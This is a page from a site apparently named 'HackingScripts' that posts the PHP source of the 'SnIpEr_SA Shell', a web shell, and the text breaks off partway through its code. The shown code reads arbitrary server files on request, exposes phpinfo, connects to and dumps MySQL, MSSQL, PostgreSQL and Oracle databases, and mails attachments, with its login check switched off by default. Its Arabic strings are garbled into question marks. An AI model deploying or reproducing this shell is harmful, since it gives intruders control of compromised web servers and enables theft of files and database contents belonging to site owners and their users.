HackingScripts

Hack Scripts for everybody

SnIpEr_SA Shell

10 Feb 2014

(c)oded by SnIpEr_SA

SnIpEr_SA Shell Source Code

   1 <?php
   2 /******************************************************************************************************/
   3 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
   4 /*  (c)oded by SnIpEr_SA
   5 /*  MAIL http://sniper-sa.com , http://sniper-sa.com
   6 /******************************************************************************************************/
   7 /* ~~~ ???????? | Options  ~~~ */
   8 // ????? | Language
   9 // $language='eng' - english (english)
  10 // $language='ar' - arabi (arabi)
  11 $language='ar';
  12 // ?????????????? | Authentification
  13 // $auth = 1; - ?????? ?????? ????? ??????  ( authentification = On  )
  14 // $auth = 0; - ?????? ?????? ????? ?????? ( authentification = Off )
  15 $auth = 0;
  16 // ????? ????? ???? ???? ?????? (Login & Password for access)
  17 // ?????? ??????? ?? ???? ???? ??? ??????!!! (CHANGE THIS!!!)
  18 // ??? ???? ???? ?????? ??? ????? ????? md5, ?????? ?????? ??? ??  'sniper'
  19 // ??????? ?? ???? ???? ????? ???? ???????? ????? md5 ?????? ?? ??????? ???????
  20 $name='1c27680133b781cadd037e8a6dcc001b'; // ??? ????????  (user login)
  21 $pass='1c27680133b781cadd037e8a6dcc001b'; // ???? ?????? (user password)
  22 /******************************************************************************************************/
  23 echo "".htmlspecialchars($copy)."";
  24 error_reporting(0);
  25 set_magic_quotes_runtime(0);
  26 @set_time_limit(0);
  27 @ini_set('max_execution_time',0);
  28 @ini_set('output_buffering',0);
  29 $safe_mode = @ini_get('safe_mode');
  30 $version = '1.31';
  31 if(version_compare(phpversion(), '4.1.0') == -1)
  32  {
  33  $_POST   = &$HTTP_POST_VARS;
  34  $_GET    = &$HTTP_GET_VARS;
  35  $_SERVER = &$HTTP_SERVER_VARS;
  36  $_COOKIE = &$HTTP_COOKIE_VARS;
  37  }
  38 if (@get_magic_quotes_gpc())
  39  {
  40  foreach ($_POST as $k=>$v)
  41   {
  42   $_POST[$k] = stripslashes($v);
  43   }
  44  foreach ($_COOKIE as $k=>$v)
  45   {
  46   $_COOKIE[$k] = stripslashes($v);
  47   }
  48  }
  49 if($auth == 1) {
  50 if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  51    {
  52    header('WWW-Authenticate: Basic realm="SnIpEr_SA shell"');
  53    header('HTTP/1.0 401 Unauthorized');
  54    exit("<b><a href=http://sniper-sa.com>SnIpEr_SA</a> : Access Denied</b>");
  55    }
  56 }
  57 $head = '<!-- SnIpEr_SA -->
  58 <html>
  59 <head>
  60 <meta http-equiv="Content-Language" content="ar-sa">
  61 <meta name="GENERATOR" content="Microsoft FrontPage 6.0">
  62 <meta name="ProgId" content="FrontPage.Editor.Document">
  63 <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  64 <title>SnIpEr_SA shell</title>
  65 
  66 <STYLE>
  67 BODY
  68  {
  69         SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
  70 }
  71 tr {
  72 BORDER-RIGHT:  #cccccc ;
  73 BORDER-TOP:    #cccccc ;
  74 BORDER-LEFT:   #cccccc ;
  75 BORDER-BOTTOM: #cccccc ;
  76 color: #ffffff;
  77 }
  78 td {
  79 BORDER-RIGHT:  #cccccc ;
  80 BORDER-TOP:    #cccccc ;
  81 BORDER-LEFT:   #cccccc ;
  82 BORDER-BOTTOM: #cccccc ;
  83 color: #cccccc;
  84 }
  85 .table1 {
  86 BORDER: 1;
  87 BACKGROUND-COLOR: #000000;
  88 color: #333333;
  89 }
  90 .td1 {
  91 BORDER: 1;
  92 font: 7pt tahoma;
  93 color: #ffffff;
  94 }
  95 .tr1 {
  96 BORDER: 1;
  97 color: #cccccc;
  98 }
  99 table {
 100 BORDER:  #eeeeee  outset;
 101 BACKGROUND-COLOR: #000000;
 102 color: #cccccc;
 103 }
 104 input {
 105 BORDER-RIGHT:  #990000 1 solid;
 106 BORDER-TOP:    #990000 1 solid;
 107 BORDER-LEFT:   #990000 1 solid;
 108 BORDER-BOTTOM: #990000 1 solid;
 109 BACKGROUND-COLOR: #333333;
 110 font: 9pt tahoma;
 111 color: #ffffff;
 112 }
 113 select {
 114 BORDER-RIGHT:  #ffffff 1 solid;
 115 BORDER-TOP:    #999999 1 solid;
 116 BORDER-LEFT:   #999999 1 solid;
 117 BORDER-BOTTOM: #ffffff 1 solid;
 118 BACKGROUND-COLOR: #000000;
 119 font: 9pt tahoma;
 120 color: #CCCCCC;;
 121 }
 122 submit {
 123 BORDER:  buttonhighlight 1 outset;
 124 BACKGROUND-COLOR: #272727;
 125 width: 40%;
 126 color: #cccccc;
 127 }
 128 textarea {
 129 BORDER-RIGHT:  #ffffff 1 solid;
 130 BORDER-TOP:    #999999 1 solid;
 131 BORDER-LEFT:   #999999 1 solid;
 132 BORDER-BOTTOM: #ffffff 1 solid;
 133 BACKGROUND-COLOR: #333333;
 134 font: Fixedsys bold;
 135 color: #ffffff;
 136 }
 137 BODY {
 138 margin: 1;
 139 color: #cccccc;
 140 background-color: #000000;
 141 }
 142 A:link {COLOR:red; TEXT-DECORATION: none}
 143 A:visited { COLOR:red; TEXT-DECORATION: none}
 144 A:active {COLOR:red; TEXT-DECORATION: none}
 145 A:hover {color:blue;TEXT-DECORATION: none}
 146 </STYLE>
 147 <script language=\'javascript\'>
 148 function hide_div(id)
 149 {
 150   document.getElementById(id).style.display = \'none\';
 151   document.cookie=id+\'=0;\';
 152 }
 153 function show_div(id)
 154 {
 155   document.getElementById(id).style.display = \'block\';
 156   document.cookie=id+\'=1;\';
 157 }
 158 function change_divst(id)
 159 {
 160   if (document.getElementById(id).style.display == \'none\')
 161     show_div(id);
 162   else
 163     hide_div(id);
 164 }
 165 </script>';
 166 class zipfile
 167 {
 168     var $datasec      = array();
 169     var $ctrl_dir     = array();
 170     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
 171     var $old_offset   = 0;
 172     function unix2DosTime($unixtime = 0) {
 173         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
 174         if ($timearray['year'] < 1980) {
 175             $timearray['year']    = 1980;
 176             $timearray['mon']     = 1;
 177             $timearray['mday']    = 1;
 178             $timearray['hours']   = 0;
 179             $timearray['minutes'] = 0;
 180             $timearray['seconds'] = 0;
 181         }
 182         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
 183                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
 184     }
 185     function addFile($data, $name, $time = 0)
 186     {
 187         $name     = str_replace('\\', '/', $name);
 188         $dtime    = dechex($this->unix2DosTime($time));
 189         $hexdtime = '\x' . $dtime[6] . $dtime[7]
 190                   . '\x' . $dtime[4] . $dtime[5]
 191                   . '\x' . $dtime[2] . $dtime[3]
 192                   . '\x' . $dtime[0] . $dtime[1];
 193         eval('$hexdtime = "' . $hexdtime . '";');
 194         $fr   = "\x50\x4b\x03\x04";
 195         $fr   .= "\x14\x00";
 196         $fr   .= "\x00\x00";
 197         $fr   .= "\x08\x00";
 198         $fr   .= $hexdtime;
 199         $unc_len = strlen($data);
 200         $crc     = crc32($data);
 201         $zdata   = gzcompress($data);
 202         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
 203         $c_len   = strlen($zdata);
 204         $fr      .= pack('V', $crc);
 205         $fr      .= pack('V', $c_len);
 206         $fr      .= pack('V', $unc_len);
 207         $fr      .= pack('v', strlen($name));
 208         $fr      .= pack('v', 0);
 209         $fr      .= $name;
 210         $fr .= $zdata;
 211         $this -> datasec[] = $fr;
 212         $cdrec = "\x50\x4b\x01\x02";
 213         $cdrec .= "\x00\x00";
 214         $cdrec .= "\x14\x00";
 215         $cdrec .= "\x00\x00";
 216         $cdrec .= "\x08\x00";
 217         $cdrec .= $hexdtime;
 218         $cdrec .= pack('V', $crc);
 219         $cdrec .= pack('V', $c_len);
 220         $cdrec .= pack('V', $unc_len);
 221         $cdrec .= pack('v', strlen($name) );
 222         $cdrec .= pack('v', 0 );
 223         $cdrec .= pack('v', 0 );
 224         $cdrec .= pack('v', 0 );
 225         $cdrec .= pack('v', 0 );
 226         $cdrec .= pack('V', 32 );
 227         $cdrec .= pack('V', $this -> old_offset );
 228         $this -> old_offset += strlen($fr);
 229         $cdrec .= $name;
 230         $this -> ctrl_dir[] = $cdrec;
 231     }
 232     function file()
 233     {
 234         $data    = implode('', $this -> datasec);
 235         $ctrldir = implode('', $this -> ctrl_dir);
 236         return
 237             $data .
 238             $ctrldir .
 239             $this -> eof_ctrl_dir .
 240             pack('v', sizeof($this -> ctrl_dir)) .
 241             pack('v', sizeof($this -> ctrl_dir)) .
 242             pack('V', strlen($ctrldir)) .
 243             pack('V', strlen($data)) .
 244             "\x00\x00";
 245     }
 246 }
 247 function compress(&$filename,&$filedump,$compress)
 248  {
 249     global $content_encoding;
 250     global $mime_type;
 251     if ($compress == 'bzip' && @function_exists('bzcompress'))
 252      {
 253         $filename  .= '.bz2';
 254         $mime_type = 'application/x-bzip2';
 255         $filedump = bzcompress($filedump);
 256      }
 257      else if ($compress == 'gzip' && @function_exists('gzencode'))
 258      {
 259         $filename  .= '.gz';
 260         $content_encoding = 'x-gzip';
 261         $mime_type = 'application/x-gzip';
 262         $filedump = gzencode($filedump);
 263      }
 264      else if ($compress == 'zip' && @function_exists('gzcompress'))
 265      {
 266              $filename .= '.zip';
 267         $mime_type = 'application/zip';
 268         $zipfile = new zipfile();
 269         $zipfile -> addFile($filedump, substr($filename, 0, -4));
 270         $filedump = $zipfile -> file();
 271      }
 272      else
 273      {
 274              $mime_type = 'application/octet-stream';
 275      }
 276  }
 277 function mailattach($to,$from,$subj,$attach)
 278  {
 279  $headers  = "From: $from\r\n";
 280  $headers .= "MIME-Version: 1.0\r\n";
 281  $headers .= "Content-Type: ".$attach['type'];
 282  $headers .= "; name=\"".$attach['name']."\"\r\n";
 283  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
 284  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
 285  if(@mail($to,$subj,"",$headers)) { return 1; }
 286  return 0;
 287  }
 288 class my_sql
 289  {
 290  var $host = 'localhost';
 291  var $port = '';
 292  var $user = '';
 293  var $pass = '';
 294  var $base = '';
 295  var $db   = '';
 296  var $connection;
 297  var $res;
 298  var $error;
 299  var $rows;
 300  var $columns;
 301  var $num_rows;
 302  var $num_fields;
 303  var $dump;
 304  function connect()
 305   {
 306           switch($this->db)
 307      {
 308            case 'MySQL':
 309             if(empty($this->port)) { $this->port = '3306'; }
 310             if(!function_exists('mysql_connect')) return 0;
 311             $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
 312             if(is_resource($this->connection)) return 1;
 313            break;
 314      case 'MSSQL':
 315       if(empty($this->port)) { $this->port = '1433'; }
 316             if(!function_exists('mssql_connect')) return 0;
 317             $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
 318       if($this->connection) return 1;
 319      break;
 320      case 'PostgreSQL':
 321       if(empty($this->port)) { $this->port = '5432'; }
 322       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
 323       if(!function_exists('pg_connect')) return 0;
 324       $this->connection = @pg_connect($str);
 325       if(is_resource($this->connection)) return 1;
 326      break;
 327      case 'Oracle':
 328       if(!function_exists('ocilogon')) return 0;
 329       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
 330       if(is_resource($this->connection)) return 1;
 331      break;
 332      }
 333     return 0;
 334   }
 335  function select_db()
 336   {
 337    switch($this->db)
 338     {
 339           case 'MySQL':
 340            if(@mysql_select_db($this->base,$this->connection)) return 1;
 341     break;
 342     case 'MSSQL':
 343            if(@mssql_select_db($this->base,$this->connection)) return 1;
 344     break;
 345     case 'PostgreSQL':
 346      return 1;
 347     break;
 348     case 'Oracle':
 349      return 1;
 350     break;
 351     }
 352    return 0;
 353   }
 354  function query($query)
 355   {
 356    $this->res=$this->error='';
 357    switch($this->db)
 358     {
 359           case 'MySQL':
 360      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
 361       {
 362       $this->error = @mysql_error($this->connection);
 363       return 0;
 364       }
 365      else if(is_resource($this->res)) { return 1; }
 366      return 2;
 367           break;
 368     case 'MSSQL':
 369      if(false===($this->res=@mssql_query($query,$this->connection)))
 370       {
 371       $this->error = 'Query error';
 372       return 0;
 373       }
 374       else if(@mssql_num_rows($this->res) > 0) { return 1; }
 375      return 2;
 376     break;
 377     case 'PostgreSQL':
 378      if(false===($this->res=@pg_query($this->connection,$query)))
 379       {
 380       $this->error = @pg_last_error($this->connection);
 381       return 0;
 382       }
 383       else if(@pg_num_rows($this->res) > 0) { return 1; }
 384      return 2;
 385     break;
 386     case 'Oracle':
 387      if(false===($this->res=@ociparse($this->connection,$query)))
 388       {
 389       $this->error = 'Query parse error';
 390       }
 391      else
 392       {
 393       if(@ociexecute($this->res))
 394        {
 395        if(@ocirowcount($this->res) != 0) return 2;
 396        return 1;
 397        }
 398       $error = @ocierror();
 399       $this->error=$error['message'];
 400       }
 401     break;
 402     }
 403   return 0;
 404   }
 405  function get_result()
 406   {
 407    $this->rows=array();
 408    $this->columns=array();
 409    $this->num_rows=$this->num_fields=0;
 410    switch($this->db)
 411     {
 412           case 'MySQL':
 413            $this->num_rows=@mysql_num_rows($this->res);
 414            $this->num_fields=@mysql_num_fields($this->res);
 415            while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
 416            @mysql_free_result($this->res);
 417            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 418     break;
 419     case 'MSSQL':
 420            $this->num_rows=@mssql_num_rows($this->res);
 421            $this->num_fields=@mssql_num_fields($this->res);
 422            while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
 423            @mssql_free_result($this->res);
 424            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
 425     break;
 426     case 'PostgreSQL':
 427            $this->num_rows=@pg_num_rows($this->res);
 428            $this->num_fields=@pg_num_fields($this->res);
 429            while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
 430            @pg_free_result($this->res);
 431            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 432     break;
 433     case 'Oracle':
 434      $this->num_fields=@ocinumcols($this->res);
 435      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
 436      @ocifreestatement($this->res);
 437      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
 438     break;
 439     }
 440    return 0;
 441   }
 442  function dump($table)
 443   {
 444    if(empty($table)) return 0;
 445    $this->dump=array();
 446    $this->dump[0] = '
 447 ###';
 448    $this->dump[1] = '
 449 ### --------------------------------------- ';
 450    $this->dump[2] = '
 451 ###  Created: '.date ("d/m/Y H:i:s");
 452    $this->dump[3] = '
 453 ### Database: '.$this->base;
 454    $this->dump[4] = '
 455 ###    Table: '.$table;
 456    $this->dump[5] = '
 457 ### --------------------------------------- ';
 458    switch($this->db)
 459     {
 460           case 'MySQL':
 461            $this->dump[0] = '
 462 ### MySQL dump';
 463            if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
 464            if(!$this->get_result()) return 0;
 465            $this->dump[] = $this->rows[0]['Create Table'];
 466      $this->dump[] = '
 467 ### --------------------------------------- ';
 468            if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
 469            if(!$this->get_result()) return 0;
 470            for($i=0;$i<$this->num_rows;$i++)
 471             {
 472       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
 473             $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 474             }
 475     break;
 476     case 'MSSQL':
 477      $this->dump[0] = '
 478 ### MSSQL dump';
 479      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 480            if(!$this->get_result()) return 0;
 481            for($i=0;$i<$this->num_rows;$i++)
 482             {
 483       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 484             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 485             }
 486     break;
 487     case 'PostgreSQL':
 488      $this->dump[0] = '
 489 ### PostgreSQL dump';
 490      if($this->query('SELECT * FROM '.$table)!=1) return 0;
 491            if(!$this->get_result()) return 0;
 492            for($i=0;$i<$this->num_rows;$i++)
 493             {
 494       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
 495             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
 496             }
 497     break;
 498     case 'Oracle':
 499       $this->dump[0] = '
 500 ### ORACLE dump';
 501       $this->dump[]  = '
 502 ### under construction';
 503     break;
 504     default:
 505      return 0;
 506     break;
 507     }
 508    return 1;
 509   }
 510  function close()
 511   {
 512    switch($this->db)
 513     {
 514           case 'MySQL':
 515            @mysql_close($this->connection);
 516     break;
 517     case 'MSSQL':
 518      @mssql_close($this->connection);
 519     break;
 520     case 'PostgreSQL':
 521      @pg_close($this->connection);
 522     break;
 523     case 'Oracle':
 524      @oci_close($this->connection);
 525     break;
 526     }
 527   }
 528  function affected_rows()
 529   {
 530    switch($this->db)
 531     {
 532           case 'MySQL':
 533            return @mysql_affected_rows($this->res);
 534     break;
 535     case 'MSSQL':
 536      return @mssql_affected_rows($this->res);
 537     break;
 538     case 'PostgreSQL':
 539      return @pg_affected_rows($this->res);
 540     break;
 541     case 'Oracle':
 542      return @ocirowcount($this->res);
 543     break;
 544     default:
 545      return 0;
 546     break;
 547     }
 548   }
 549  }
 550 if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
 551  {
 552   if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
 553   else
 554    {
 555     @ob_clean();
 556     $filename = @basename($_POST['d_name']);
 557     $filedump = @fread($file,@filesize($_POST['d_name']));
 558     fclose($file);
 559     $content_encoding=$mime_type='';
 560     compress($filename,$filedump,$_POST['compress']);
 561     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
 562     header("Content-type: ".$mime_type);
 563     header("Content-disposition: attachment; filename=\"".$filename."\";");
 564     echo $filedump;
 565     exit();
 566    }
 567  }
 568 if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
 569 if(isset($_GET['sqlman'])) {
 570 session_start();
 571 $action = $HTTP_GET_VARS['action'];
 572 $pagemax=20; // Maximum rows displaed per page, change to display more or less rows per page.
 573 function show_login($dbnamearray){
 574      $hostdefault="localhost";
 575                 echo"<table>";
 576                 echo"<form  name='showlogin' method='post' action='$action'>";
 577         if(count($hostdefault) > 1){
 578             echo"<tr><td>??? C???????:</td><td><select name=host>";
 579             for($x=0; $x < count($hostdefault);$x++){
 580                 echo"<option value=$hostdefault[$x]>$hostdefault[$x]";
 581             }
 582             echo"</select></td></tr>\n";
 583         }else{
 584             echo"<tr><td>????? ????? ????????:</td><td><input type=text name='host' size=15 value=$hostdefault /></td></tr>\n";
 585                 }
 586         echo"<tr><td>??? ????????:</td><td><input type=text name='userid' size=15 /></td></tr>\n";
 587                 echo"<tr><td>???? ??????:</td><td><input type=password name='pword1' size=15 /></td></tr>\n";
 588                 If($dbnamearray != ""){
 589                         echo"<tr><td>?C?IE C?E?C?CE:</td><td><select name='dbna'>\n";
 590                         for ($i =0; $i < count($dbnamearray); $i++) {
 591                                 $dbn=$dbnamearray[$i];
 592                                 echo"<option value=$dbn>$dbn";
 593                         }
 594                 }
 595                 echo"<tr><td><input class=ser type='submit' name='login' value='????' /></td>\n";
 596                 echo"<td><input class=ser type=reset name='reset' value='???' /></td></tr>\n";
 597                 echo"</form></table>\n";
 598 }
 599 function dbrestrict(){
 600 if(isset($_SESSION['user'])){
 601     $user=$_SESSION['user'];
 602     switch($user){
 603     //Edit these ** values. You can add more case statements.
 604         case '**User**':
 605             $dbnamearray= array('**dbname**', '**dbname2**', '**dbname**');
 606             break;
 607      //end edit values
 608         default:
 609             $_SESSION['defaltuser']=true;
 610             $dbnamearray = array();
 611             $link = connectmysql();
 612             $db_list = mysql_list_dbs($link); //$db_list
 613                     $cnt = mysql_num_rows($db_list);
 614                     for ($i =0; $i < $cnt; $i++) {
 615                             $dbnamearray[$i]= mysql_db_name($db_list, $i);
 616                     }
 617     }
 618     return $dbnamearray;
 619 }
 620 }
 621 //***************************************************************
 622 //function showdbs($dbnamearray, $backuppath){
 623 function showdbs($dbnamearray){
 624     //$backuppath=addslashes($backuppath);
 625        echo"<table>\n";
 626        for ($i =0; $i < count($dbnamearray); $i++) {
 627                     echo"<tr><td>";
 628             $dbn=$dbnamearray[$i];
 629                         $va="?????? ??? ????? $dbn";
 630                         goto(' ', $dbn,$action, 'but', 'db', $va );
 631             $dbs=mysize($dbnamearray[$i],"");
 632             echo"</td><td>$dbs</td></tr>\n";
 633         }
 634     echo"</table>\n";
 635 }
 636 
 637 //********************* Show Logout Button **********
 638 function endsess(){
 639 echo"<form method='post' name='endsess' action='$action'>\n";
 640 echo"<input class=ser type='submit' name='logout' value='????' />\n";
 641 echo"</form>";
 642 }
 643 //********************************************************************
 644 function connectmysql(){
 645         //Connects to the MySQL Database.
 646 
 647         if (isset($_SESSION['user']) && isset($_SESSION['password'])){
 648                  $user = $_SESSION['user'];
 649                  $pass = $_SESSION['password'];
 650         }else{
 651         display_foot();
 652         echo"\n</body>\n</html>";
 653                 exit();
 654         }
 655         $link = @mysql_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['password']);
 656         if(! $link){
 657                 echo"<div class='error'>\n";
 658                 echo"Unable to connect to the database server. <BR>";
 659                 echo"The Host: $_SESSION[host], ??? ????????: $user ?? ?????? ?????? ????. <br>";
 660                 echo"????? ??? ???? ???????? ??? ????.\n";
 661                 echo"</div>\n";
 662         return false;
 663                 exit();
 664         } else{
 665                 return $link;
 666         }
 667 }
 668 //*********************************************************************
 669 function connectdb($db, $link){
 670         if(! mysql_select_db($db,$link)){
 671                 echo"Unable to locate database $db.<br> Please try again later.\n";
 672                 exit();
 673         }
 674 }
 675 //*********************************************************************
 676 function exequery($sql, $tablename, $db){
 677         $result= @mysql_query( $sql );
 678         if($result){
 679                 //echo "Query successful";
 680                 return $result;
 681         }else{
 682                 echo"Sorry your Query failed: $sql <br> error:".mysql_error()."\n";
 683                 return false;
 684         }
 685 }
 686 
 687 //***************************************************
 688 $fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT",
 689   "INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION",
 690  "REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" );
 691 
 692 //****************** Search Form ****************************
 693 function searchtableform($tablename, $dbname){
 694         echo"<form method='post' action='$action'>\n";
 695         echo"<input type=hidden name='dbname' value='$dbname' />\n";
 696         echo"<input type=hidden name='tablename' value='$tablename' />\n";
 697         echo"<input type=text name='searchval' />\n";
 698         echo"<input class=ser type=submit name='search' value='Search $tablename' />\n";
 699         echo"</form>\n";
 700 }
 701 //********************* Search *************************
 702 function searcht($tablename, $dbname, $searchval){
 703         if(! empty($searchval)){
 704                 //        $searchval= str_replace(";",' ', $searchval);
 705         $result=exequery("Select * from $tablename", $tablename, $dbname);
 706                 //$result=mysql_query("Select * from $tablename");
 707                 $num = mysql_num_fields($result);
 708                 $fields = mysql_list_fields($dbname, $tablename);
 709                 $whr="where ";
 710                 $tok=explode(" ",$searchval);
 711                 for ($t =0; $t < count($tok); $t++){
 712                         for ( $c = 0; $c < $num; $c++){
 713                                 $fn =mysql_field_name($fields, $c);
 714                                 $whr .=" $fn like '%$tok[$t]%' or ";
 715                         }
 716                 }
 717                 $whr=trim(substr_replace($whr, " ", -3));
 718                 $query="Select * from $tablename $whr";
 719                 $result=exequery($query, $tablename, $dbname);
 720                 return $result;
 721         }
 722 }
 723 //*********************GOTO buttons*************************
 724 //provides a form and button.
 725 function goto($tablename, $dbname, $action, $class, $name, $va ){
 726         //Adds a button.
 727         echo"<form action='$action' method='post' >\n";
 728                 if(! eregi('tablestart', $name)){
 729                         echo"<input type=hidden name=dbname value='$dbname' />\n";
 730                         echo"<input type=hidden name=tablename value='$tablename' />\n";
 731                 }
 732                 echo"<input class=$class type=submit  value='$va' name='$name' />\n";
 733                 //echo"<input class=$class type=submit  value='$action' name=$name>";
 734         echo"</form>\n";
 735         //echo"<a class=$class href=$action>$va</a>";
 736         //}
 737 }
 738 //*********************** ShowDB ***********************************
 739 function showdb(){
 740 //function showdb($backuppath){
 741         $link=connectmysql();
 742         if ($link){
 743         echo"<div class='db'>";
 744                 echo"<div class='cream'>\n";
 745                 echo"<h2 class=h >????? ????? ?????</h2>\n";
 746                 echo"<form name=cdb action='$action' method='post' >\n";
 747                 echo"??? ??????? ???????: <input type=text name=ndbname />\n";
 748                 echo"<br /><br /><input class=but type='submit' name='cndb' value='????? ????? ?????' />\n";
 749                 echo"</form><br />";
 750                 echo"</div>";
 751                 echo"<h2 class=h >????? ??????? ????????</h2>\n";
 752                 //Restrict the database for users
 753         $dbnamearray= dbrestrict();
 754         showdbs($dbnamearray);
 755         echo"</div>";
 756            }
 757 }
 758 //********************** BuildWhr ******************************
 759 //Builds the Where part of queries.
 760 function buildwhr($pk, $pv){
 761         $whr="";
 762         $pn =count($pv);
 763         for($t =0; $t < $pn; $t++){
 764                 $whr.="$pk[$t]='$pv[$t]'";
 765                 if($t < $pn-1){
 766                         $whr.=" and ";
 767                 }
 768         }
 769         if ($whr !=" "){
 770                 return $whr;
 771         }else{
 772                 return false;
 773         }
 774 }
 775 //***********************ADD Record ******************
 776 function addrecord($tablename, $dbname, $array){
 777      $result=exequery("Select * from $tablename", $tablename, $dbname);
 778         //$result = @mysql_query( "Select * from $tablename" );
 779         $flds = mysql_num_fields($result);
 780         //$fields = mysql_list_fields($dbname, $tablename);
 781            $qry=" ";
 782     $query = "Insert into $tablename Values( ";
 783         for ($x =0; $x < $flds; $x++){
 784         //Multiple Select values for SET
 785        if(is_array($array[$x])){
 786             $mval="";
 787             for($m=0; $m < count($array[$x]); $m++){
 788                 if($m+1 == count($array[$x])){
 789                     $mval.= AddSlashes($array[$x][$m]);
 790                 }else{
 791                     $mval.= AddSlashes($array[$x][$m]).",";
 792                 }
 793                 $fval = $mval;
 794             }
 795         }else{
 796                     $fval = AddSlashes($array[$x]);
 797         }
 798                 $qry .= "'$fval'";
 799                 if ($x < $flds-1){
 800                         $qry.= ", ";
 801                 }
 802         }
 803         $query .= $qry.")";
 804    // echo"qry: $qry";
 805         $result=exequery($query, $tablename, $dbname);
 806         if($result){
 807                 return $result;
 808         }else{
 809                 return false;
 810         }
 811 }
 812 //**********************ADD Form **********************
 813 function addform($tablename, $dbname){
 814  //Display the field names and input boxes
 815  echo"<form action='$action' method='post'>\n";
 816  echo"<table border=0 width='100%' align='center'>\n";
 817  echo"<tr class=head><td>Field Name</td><td>Type</td><td>Value</td></tr>\n";
 818   $result=exequery("Select * from $tablename", $tablename, $dbname);
 819  //$result = @mysql_query( "Select * from $tablename" );
 820  $flds = mysql_num_fields($result);
 821  $fields = mysql_list_fields($dbname, $tablename);
 822  echo"<input type=hidden name=tablename value='$tablename' />\n";
 823  echo"<input type=hidden name='dbname' value='$dbname' />\n";
 824  echo"<tr>\n";
 825  $mxlen = 80;//max width of the form fields.
 826  for($i=0; $i < $flds; $i++){
 827       $auto = "false";
 828       echo "<th>".mysql_field_name($fields, $i);
 829       $fieldname = mysql_field_name($fields, $i);  // added
 830       $type  = mysql_field_type($result, $i);
 831       $flen = mysql_field_len($result, $i);//length of the field
 832       $flagstring = mysql_field_flags ($result, $i);
 833     // Start of new code for set drop down
 834       $newsql = "show columns from $tablename like '%".$fieldname."'";
 835       $newresult = exequery($newsql, $tablename, $dbname);
 836       //mysql_query($newsql) or die ('I cannot get the query because: ' . mysql_error());
 837       $arr=mysql_fetch_array($newresult);
 838     // End of new code block for set drop down
 839       if (eregi("primary",$flagstring )){
 840        $type .= " PK ";
 841       }
 842       if(eregi("auto",$flagstring )){
 843        $type .= " auto_increment";
 844        $auto = "true";
 845       }
 846       if ($auto=="true"){
 847         echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' value=0 /></td></tr>\n";
 848       }elseif($flen > $mxlen){
 849         $rws= $flen/$mxlen;
 850         if($rws>10){
 851              $rws=10; //max length of textarea
 852         }
 853         echo"<td>$type</td><td><textarea name='array[$i]' rows=$rws cols=$mxlen></textarea></td></tr>\n";
